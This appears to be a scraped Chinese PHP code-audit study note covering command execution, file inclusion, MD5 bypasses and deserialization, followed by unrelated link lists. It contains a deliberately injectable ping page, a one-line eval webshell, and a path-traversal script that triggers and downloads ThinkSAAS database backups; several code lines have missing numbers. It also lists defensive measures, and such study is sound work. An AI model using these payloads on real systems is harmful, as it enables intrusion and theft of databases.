RCE

RCE函数

eval、preg_replace + /e模式、assertJavascript:evalVbscript: Execute、EvalPython:exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?>

  <br/><b>Ping:</b>Please Enter Domain Name or IP Address: <br/><br/>

  <form action="cmd.php" method="get">

  <input type="text" name="host" value=""/>

  <br/><br/><input type="submit" name="Go" value="Go"/>

  </form>

  <br/>

<?php

if(isset($_GET['host']))

{

if(strtoupper(substr(PHP_OS, , )) === 'WIN')

{

$result=shell_exec("ping ".$_GET['host']);

}

else

{

$result=shell_exec("ping -c 4 ".$_GET['host']);

}

echo "<b>Result:</b></br><pre>".$result."</pre>";

}

?>

<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
<?php

eval($_REQUEST['code']);

?>

 LFI -》 备份文件下载

<?php

//插件条件入口

defined('IN_TS') or die('Access Denied.');

if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){

    require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php');

}else{

    tsNotice('sorry:no plugin!');

}

defined('IN_TS') or die('Access Denied.');

switch($ts){

    case "":

        //输出备份文件

        $arrSqlFile = tsScanDir('data/baksql','file');

        include template('sql');

        break;

    //优化

    case "optimize":

        $arrTables = $db->fetch_all_assoc("SHOW TABLES");

        foreach($arrTables as $key=>$item){

            $db->query("OPTIMIZE TABLE `".$item."` ");

        }

        qiMsg('优化数据库成功!');

        break;

    //备份导出

    case "export":

        require_once 'thinksaas/DbManage.php';

        $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' );

        $bakdb->backup ('','data/baksql/');

        qiMsg('数据库备份完毕!');

        break;

?php

date_default_timezone_set('Asia/Hong_Kong');

$url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export";

file_get_contents($url);

$time = date('YmdHis');

for($i = $time; $i <= $time + ; $i++){

    $filename = $i ."_all_v1.sql";

    $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename;

    if (@file_get_contents($url, null, null, -, )){

        echo $url;

    }

}

?>

php绕过MD5 - 科学计数法绕过

php绕过MD5 - 数组全等绕过

PHP版本漏洞

PHP5..x     00截断        例如url输入的文件名1.txt%.jpg经过url转码后会变为1.txt\.jpg

反序列化

常见魔术方法 
__construct()__destruct()__call()__callStatic()__get()__set()__isset()__unset()__sleep()__wakeup()__toString()__invoke()__set_state()__clone(),
__debugInfo() 

逻辑判断 -
CVE-2016-7124(__wakeup()魔术方法绕过)  漏洞影响版本:PHP5 < 5.6.25 | PHP7 < 7.0.1
框架反序列化

Joomla反序列化漏洞

框架漏洞

thinkphp    thinkphp5远程代码执行漏洞

修复 - 》 ThinkPHP .0系列升级到 5.0. ,ThinkPHP .1系列升级到 5.1.

RCE - 防御

防御

. 尽量少用执行命令的函数或者直接禁用

. 参数值尽量使用引号包括

. 在使用动态函数之前,确保使用的函数是指定的函数之一

. 在进入执行命令的函数/方法之前,对参数进行过滤,对敏感字符进行转义

. 能使用脚本解决的工作,不要调用其他程序处理。尽量少用执行命令的函数,并在disable_functions中禁用

. 对于可控点是程序参数的情况下,使用escapeshellcmd函数进行过滤,对于可控点是程序参数值的情况下,使用escapeshellarg函数进行过滤

. 参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义

而针对由特定第三方组件引发的漏洞,我们要做的就是及时打补丁,修改安装时的默认配置

应用安全 - 代码审计 - PHP的更多相关文章

  1. PHP代码审计中你不知道的牛叉技术点

    一.前言 php代码审计如字面意思,对php源代码进行审查,理解代码的逻辑,发现其中的安全漏洞.如审计代码中是否存在sql注入,则检查代码中sql语句到数据库的传输 和调用过程. 入门php代码审计实 ...

  2. 技术专题-PHP代码审计

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/24472674来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 一.前言 php代码审计如字面 ...

  3. 关于PHP代码审计和漏洞挖掘的一点思考

    这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出. PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂 ...

  4. Kindeditor 代码审计

    <?php /** * KindEditor PHP * * 本PHP程序是演示程序,建议不要直接在实际项目中使用. * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置. * */ r ...

  5. 一个CMS案例实战讲解PHP代码审计入门

    前言 php代码审计介绍:顾名思义就是检查php源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞. 1.环境搭建: 工欲善其事必先利其器,先介绍代码审计必要的环境搭建 审计环境 window ...

  6. php代码审计基础笔记

    出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059 --------------------------- ...

  7. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.同上一篇,我 ...

  8. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.遇到这种情况 ...

  9. PHP代码审计】 那些年我们一起挖掘SQL注入 - 1.什么都没过滤的入门情况

    0x01 背景 首先恭喜Seay法师的力作<代码审计:企业级web代码安全架构>,读了两天后深有感触.想了想自己也做审计有2年了,决定写个PHP代码审计实例教程的系列,希望能够帮助到新人更 ...

  10. 【转】PHP代码审计

    PHP代码审计 目录 1. 概述3 2. 输入验证和输出显示3 2.1 命令注入4 2.2 跨站脚本4 2.3 文件包含5 2.4 代码注入5 2.5 SQL注入6 2.6 XPath注入6 2.7 ...

随机推荐

  1. linux MySql 的主从复制部署

    MySql 复制 mysql 复制:将某一台主机上的 Mysql 数据复制到其它主机(slaves)上,并重新执行一遍从而实现 当前主机上的 mysql 数据与(master)主机上数据保持一致的过程 ...

  2. 1、Framework7

    一. <!DOCTYPE html> <html> <head> <!-- 所需的Meta标签--> <meta charset="ut ...

  3. 03python面向对象编程之Python中单下划线和双下划线的区别7

    通常Python类中会有_和__的方法,是指什么意思呢?如下: 双下划线表示内部不允许访问,一个下划线表示这样的实例变量外部是可以访问的,但是,按照约定俗成的规定,当你看到这样的变量时,意思就是,“虽 ...

  4. 1130. Infix Expression (25)

    Given a syntax tree (binary), you are supposed to output the corresponding infix expression, with pa ...

  5. 10年前文章_mysql 中文设置

    下面的设置针对GB2312, 1  创建数据库时使用 GBK 字符集 CREATE DATABASE `orange` DEFAULT CHARACTER SET gbk COLLATE gbk_ch ...

  6. 磁盘,fdisk分区,MBR,dd命令

    光盘和磁盘.u盘.软盘.硬盘有什么区别 ①光盘: cdrom/dvdrom:光驱(光盘驱动器)    rom:只读    ram:可以擦写    cd:700M    dvd:4G ②软盘:flopp ...

  7. bzoj4025 二分图 LCT + 最小生成树

    题目传送门 https://lydsy.com/JudgeOnline/problem.php?id=4025 题解 貌似这道题有一个非常简单的做法是线段树分治+并查集. 可是我是为了练 LCT 来做 ...

  8. RPC vs REST

    RPC vs REST 另外,由于Dubbo是基础框架,其实现的内容对于我们实施微服务架构是否合理,也需要我们根据自身需求去考虑是否要修改,比如Dubbo的服务调用是通过RPC实现的,但是如果仔细拜读 ...

  9. 用vue构建项目同一局域网下通过ip访问

    在webpack配置文件下改为 host:'0.0.0.0' 改为后启动跳转不到登录页面 需手动修改浏览器上的0.0.0.0:8080为自己ip加上:8080 就可以在别的电脑上进行访问了 举一反三: ...

  10. android平台上AES,DES加解密及问题

    在使用java进行AES加密的时候,会用到如下方法: SecureRandom sr = SecureRandom.getInstance("SHA1PRNG"); 但是在andr ...